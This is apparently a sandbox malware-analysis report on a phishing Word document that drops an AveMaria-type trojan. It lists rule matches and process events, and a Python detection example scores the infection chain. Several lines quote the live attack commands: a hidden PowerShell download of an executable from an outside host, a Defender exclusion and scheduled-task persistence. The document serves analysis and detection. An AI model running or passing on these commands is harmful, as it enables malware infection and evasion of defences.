Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1312, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 2072, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$em Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winDOC@43/31@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Program Files\Microsoft DN1
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: *.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /ignoreprojectextensions:.sln
Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE document summary: edited time not present or 0
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Roaming\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
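The process tree above (WINWORD.EXE spawning a hidden, execution-policy-bypassed PowerShell downloader, cmd.exe launching an explorer.exe dropped into %APPDATA%, that dropper adding a Defender exclusion, importing a scheduled task from a %TEMP% XML and starting MSBuild.exe as an injection host) is the part of this report a detection engineer will reuse. The Python below is an added example, not part of the sandbox report or of any vendor tooling: it scores process-creation events against those behaviours and folds a whole tree into the stages it covers. The event schema (parent image, child image, command line), the tag and stage names, and the sample events are this example's own; the sample command lines are constructed from the ones quoted in this report rather than taken from a real EDR feed.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: creating image, created image and its command line."""
    parent: str
    image: str
    cmdline: str

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SYSTEM_NAMES = {"explorer.exe", "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe"}
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Behaviour tags matched by one event; an empty list means nothing of note."""
    parent, child = basename(ev.parent), basename(ev.image)
    cmd = ev.cmdline.lower()
    tags: list[str] = []
    # Office spawning a scripting host is the document-exploit entry point.
    if parent in OFFICE_IMAGES and child in SCRIPT_HOSTS:
        tags.append("office_spawns_script_host")
    if child == "powershell.exe":
        if re.search(r"-(executionpolicy|ep)\s+bypass", cmd):
            tags.append("ps_execution_policy_bypass")
        if re.search(r"-w(indowstyle)?\s+hidden", cmd):
            tags.append("ps_hidden_window")
        if re.search(r"\.download(file|string)\(", cmd):
            tags.append("ps_webclient_download")
        if "add-mppreference" in cmd and "-exclusionpath" in cmd:
            tags.append("defender_exclusion_added")
    # A binary carrying a system name but running from the user profile (explorer.exe in %APPDATA%).
    if child in SYSTEM_NAMES and "\\appdata\\" in ev.image.lower():
        tags.append("system_name_in_user_profile")
    # Task definition imported from %TEMP% (the tmpXXXX.tmp XML in the report).
    if child == "schtasks.exe" and "/create" in cmd and re.search(r'/xml\s+"?[^"]*\\temp\\', cmd):
        tags.append("schtasks_xml_from_temp")
    # MSBuild.exe started by something that is not a build tool: a common injection host.
    if child == "msbuild.exe" and parent not in BUILD_PARENTS:
        tags.append("msbuild_from_non_build_parent")
    return tags

STAGES = {  # tag groups; the names are this example's own, not a sandbox taxonomy
    "initial_access": {"office_spawns_script_host"},
    "download": {"ps_webclient_download"},
    "defense_evasion": {"ps_execution_policy_bypass", "defender_exclusion_added"},
    "persistence": {"schtasks_xml_from_temp"},
    "masquerade_or_injection_host": {"system_name_in_user_profile", "msbuild_from_non_build_parent"},
}

def chain_verdict(events: list[ProcEvent]) -> tuple[list[str], list[str]]:
    """Fold a process tree into (stages seen, tags seen), both sorted; all five stages means this chain."""
    seen: set[str] = set()
    for ev in events:
        seen.update(classify(ev))
    return sorted(s for s, t in STAGES.items() if t & seen), sorted(seen)

WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
DROPPER = r"C:\Users\user\AppData\Roaming\explorer.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

SAMPLE_EVENTS = [  # constructed from the command lines in this report, not a real EDR feed
    ProcEvent(WINWORD, PS64, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI '''
              r'''-W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient)'''
              r'''.DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','''
              r'''C:\Users\user\AppData\Roaming\explorer.exe')"'''),
    ProcEvent(WINWORD, CMD, r'"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe'),
    ProcEvent(CMD, DROPPER, DROPPER),
    ProcEvent(DROPPER, PS32, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                             r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe"'),
    ProcEvent(DROPPER, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" '
                                 r'/XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp"'),
    ProcEvent(DROPPER, MSBUILD, MSBUILD),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{basename(ev.parent)} -> {basename(ev.image)}: {classify(ev)}")
    print(chain_verdict(SAMPLE_EVENTS))
```

Each tag on its own is noisy (developers run MSBuild, admins add Defender exclusions); the point of chain_verdict is that the combination across one process tree is what separates this sample from ordinary activity. The schtasks "ERROR:" console output at the top of this section is also worth keeping in mind: a task-creation failure in the sandbox does not change the verdict, because the attempt itself is the indicator.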
Source: C:\Users\user\AppData\Roaming\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR52EF.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\explorer.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\explorer.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\explorer.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory created: C:\Program Files\Microsoft DN1
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
